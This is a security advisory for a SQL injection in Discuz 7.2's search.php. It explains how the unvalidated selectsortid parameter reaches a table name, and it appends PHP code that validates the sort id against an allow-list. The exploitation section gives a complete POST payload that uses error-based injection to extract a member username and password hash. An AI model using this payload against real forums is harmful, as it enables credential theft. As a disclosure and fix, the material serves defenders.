Discuz 7.2 /search.php SQL Injection Vulnerability

2014-07-30T00:00:00
ID SSV:88733
Type seebug
Reporter Root
Modified 2014-07-30T00:00:00

Description

<p>At line 150 of the file /include/search_sort.inc.php<br></p>
<pre class="">@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php'; </pre>
<p>the $selectsortid variable is used without any validation or escaping, and it then reaches the SQL statement at line 170<br></p>
<pre class="">$query = $db->query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '').""); </pre>
<p>where it is concatenated into the table name, which results in SQL injection.<br></p>
<p>Exploitation process</p>
<p>1. Log in to the forum</p>
<p>2. Visit</p>
<p><a href="http://xxxx.com/search.php">http://xxxx.com/search.php</a></p>
<p>POST data:</p>
<pre class="">formhash=1&srchtype=threadsort&st=on&sortid=3&searchsubmit=true&selectsortid=3 where tid =1 and (select 1 from (select count(),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)%23&srcchtxt=aaa </pre>
<p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683988673-1.png" data-image-size="865,296"><br></p>
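<p>Added example, not Discuz's own code or its vendor patch: both places the advisory shows $selectsortid being used (the include_once path at line 150 and the table name at line 170) are put behind an integer check plus an allow-list, so a value such as "3 where tid =1 ..." is refused before it touches the filesystem or the database. DISCUZ_ROOT, $tablepre, the $db handle and the list of defined sort ids are assumptions standing in for the real forum configuration.</p>

```php
<?php
// Added example (not Discuz code): validate $selectsortid before it reaches
// include_once or the table name. DISCUZ_ROOT, $tablepre and $db are assumed
// to exist as in search_sort.inc.php.

// A sort id is only ever a small positive integer. Reject anything else
// (the injected "3 where tid =1 and (...)" fails this check), then allow-list
// it against the sort ids the forum actually defines.
function resolve_sortid($raw, array $allowed_sortids): ?int
{
    if (!is_int($raw) && !is_string($raw)) {
        return null;
    }
    if (!preg_match('/^[1-9][0-9]{0,9}$/', (string) $raw)) {
        return null;
    }
    $id = (int) $raw;
    return in_array($id, $allowed_sortids, true) ? $id : null;
}

// Returns the cache path and the SQL that the original lines 150 and 170
// build, but only for a validated id; null means "refuse the request".
function threadsort_targets(string $root, string $tablepre, $raw, array $allowed, string $sqlsrch = ''): ?array
{
    $id = resolve_sortid($raw, $allowed);
    if ($id === null) {
        return null;
    }
    // $sqlsrch is passed through unchanged here; its own sanitisation is a
    // separate concern that this example does not cover.
    return [
        'cache' => $root . './forumdata/cache/threadsort_' . $id . '.php',
        'sql'   => "SELECT tid FROM {$tablepre}optionvalue{$id} "
                 . ($sqlsrch !== '' ? 'WHERE ' . $sqlsrch : ''),
    ];
}

// Constructed inputs: a legitimate sort id, the shape of the injected value,
// and an integer that is not a defined sort.
$allowed = [1, 2, 3]; // constructed; Discuz reads these from its threadsort cache
foreach (['3', '3 where tid =1 and (...)', '7'] as $candidate) {
    $t = threadsort_targets('/var/www/discuz/', 'cdb_', $candidate, $allowed);
    echo str_pad(var_export($candidate, true), 32),
         ' -> ', $t === null ? 'rejected' : $t['sql'], PHP_EOL;
}
```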